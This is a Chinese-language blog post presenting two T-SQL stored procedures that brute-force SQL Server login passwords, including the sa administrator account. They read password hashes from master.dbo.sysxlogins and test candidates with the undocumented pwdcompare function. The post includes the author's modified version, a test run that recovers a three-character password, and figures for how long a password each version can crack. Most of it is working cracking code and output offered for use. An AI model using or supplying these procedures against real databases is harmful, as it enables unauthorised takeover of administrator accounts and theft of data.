mssql使用存储过程破解sa密码

代码演示暴力破解mssql的帐号和密码,包括管理员帐号sa的密码。

网上有sql server sa密码破解的存储过程,方法就是暴力破解mssql的帐号和密码,包括管理员帐号sa的密码,下面我对其它的代码稍做修改,并进行了一些性能分析。

首先说说破解过程序核心思想,就是存储帐号密码的master.dbo.sysxlogins表和未公布的密码比较存储过程pwdcompare。经过一方分析,修改了部分代码,下面贴出修改前后的代码,

一个sql server sa密码破解的存储过程

复制代码 代码如下:

alter proc p_getpassword

    @username sysname=null, –用户名,如果不指定,则列出所有用户

    @pwdlen int=2 –要破解的密码的位数,默认是2位及以下的

as

    set @pwdlen=case when isnull(@pwdlen,0)<1 then 1 else @pwdlen-1 end

    select top 255 id=identity(int,0,1) into #t from syscolumns

    alter table #t add constraint pk_#t primary key(id)

    select name,password

        ,type=case when xstatus&2048=2048 then 1 else 0 end

        ,jm=case when password is null then 1 else 0 end

        ,pwdstr=cast(” as sysname)

        ,pwd=cast(” as varchar(8000))

        into #pwd

    from master.dbo.sysxlogins a

    where srvid is null

        and name=isnull(@username,name)

    declare @s1 varchar(8000),@s2 varchar(8000),@s3 varchar(8000)

    declare @l int

    select @l=0

        ,@s1=’char(aa.id)’

        ,@s2=’cast(aa.id as varchar)’

        ,@s3=’,#t aa’

    exec(‘

        update pwd set jm=1,pwdstr=’+@s1+’

        ,pwd=’+@s2+’

        from #pwd pwd’+@s3+’

        where pwd.jm=0

        and pwdcompare(‘+@s1+’,pwd.password,pwd.type)=1

        ‘)

    while exists(select 1 from #pwd where jm=0 and @l<@pwdlen)

    begin

        select @l=@l+1

        ,@s1=@s1+’+char(‘+char(@l/26+97)+char(@l%26+97)+’.id)’

        ,@s2=@s2+’+”,”+cast(‘+char(@l/26+97)+char(@l%26+97)+’.id as varchar)’

        ,@s3=@s3+’,#t ‘+char(@l/26+97)+char(@l%26+97)

        exec(‘

        update pwd set jm=1,pwdstr=’+@s1+’

        ,pwd=’+@s2+’

        from #pwd pwd’+@s3+’

        where pwd.jm=0

        and pwdcompare(‘+@s1+’,pwd.password,pwd.type)=1

        ‘)

    end

    select 用户名=name,密码=pwdstr,密码ascii=pwd

    from #pwd

go

 下面是我修改后的代码:

复制代码 代码如下:

alter proc p_getpassword2

    @username sysname=null, –用户名,如果不指定,则列出所有用户

    @pwdlen int=2 –要破解的密码的位数,默认是2位及以下的

as

    set nocount on

    if object_id(n’tempdb..#t’) is not null
        drop table #t
    if object_id(n’tempdb..#pwd’) is not null
        drop table #pwd

    set @pwdlen=case when isnull(@pwdlen,0)<1 then 1 else @pwdlen-1 end

    declare @ss varchar(256)
    –select @ss= ‘123456789’
    select @ss=    ‘abcdefghijklmnopqrstuvwxyz’
    select @ss=@ss+ ‘`0123456789-=[]\;,./’
    select @ss=@ss+ ‘~!@#$%^&*()_+{}|:<>?’
    –select @ss=@ss+    ‘abcdefghijklmnopqrstuvwxyz’

    create table #t(c char(1) not null)
    alter table #t add constraint pk_#t primary key clustered (c)
    declare @index int
    select @index=1
    while (@index <=len(@ss))
    begin
        insert #t select substring(@ss, @index, 1)
        select @index = @index +1
    end

    select name,password
        ,type=case when xstatus&2048=2048 then 1 else 0 end
        ,jm=case when password is null then 1 else 0 end
        ,pwdstr=cast(” as sysname)
        ,pwd=cast(” as varchar(8000))
        ,times =cast(” as varchar(8000))
        into #pwd
    from master.dbo.sysxlogins a
    where srvid is null
        and name=isnull(@username,name)
    declare @s1 varchar(8000),@s2 varchar(8000),@s3 varchar(8000), @stimes varchar(8000)

    declare @l int, @t bigint

    select @t = count(1)*power(len(@ss),1) from #pwd

    select @l=0
        ,@s1=’aa.c’
        ,@s2=’cast(ascii(aa.c) as varchar)’
        ,@s3=’,#t aa’
        ,@stimes=’1th,’ + cast(@t as varchar(20)) + ‘rows’

    exec(‘
        update pwd set jm=1,pwdstr=’+@s1+’
        ,pwd=’+@s2+’
        from #pwd pwd’+@s3+’
        where pwd.jm=0
        and pwdcompare(‘+@s1+’,pwd.password,pwd.type)=1
        ‘)
    while exists(select 1 from #pwd where jm=0 and @l<@pwdlen)
    begin
        select @l=@l+1
        select @t = count(1)*power(len(@ss),@l+1) from #pwd
        print @t

        select
        @s1=@s1+’+’+char(@l/26+97)+char(@l%26+97)+’.c’
        ,@s2=@s2+’+”,”+cast(ascii(‘+char(@l/26+97)+char(@l%26+97)+’.c) as varchar)’
        ,@s3=@s3+’,#t ‘+char(@l/26+97)+char(@l%26+97)
        ,@stimes=@stimes+’;’+ cast(@l+1 as varchar(1)) + ‘th,’ + cast(@t as varchar(20)) + ‘rows’

        exec(‘
        update pwd set jm=1,pwdstr=’+@s1+’
        ,pwd=’+@s2+’
        ,times=”’+@stimes+”’
        from #pwd pwd’+@s3+’
        where pwd.jm=0
        and pwdcompare(‘+@s1+’,pwd.password,pwd.type)=1
        ‘)
    end
    select 用户名=name,密码=pwdstr,密码ascii=pwd, 查询次数和行数=times
    from #pwd

    if object_id(n’tempdb..#t’) is not null
        drop table #t
    if object_id(n’tempdb..#pwd’) is not null
        drop table #pwd

我测试如下

复制代码 代码如下:

p_getpassword2 ‘b’, 6

用户名 密码 密码ascii 查询次数和行数
b 123 49,50,51 1th,66rows;2th,4356rows;3th,287496rows
 

性能分析:

本例以一个查询能查询bigint的最大值条记录9223372036854775807为限做为主机最大性能,来粗略计算破解性能。

破解一个帐号的密码长度,破解时间和性能消耗,是以所有用于破解的字符长度为底,以密码长度为指数的指数函数,即:破解帐号个数 * (所有用于破解的字符个数)最长密码长度次方 < 主机最大性能:

原存储过程使用256个破解字符,理论上可以破解7位密码,即2567<max(bigint)。
我修改的存储过程使用66个键盘常规字符,理论上可以破解10位密码,即6610<max(bigint)。
如果知道密码是10个数字字符的组合,理论上可以破解19位密码,即1019<max(bigint)。

(0)
上一篇 2022年3月21日
下一篇 2022年3月21日

相关推荐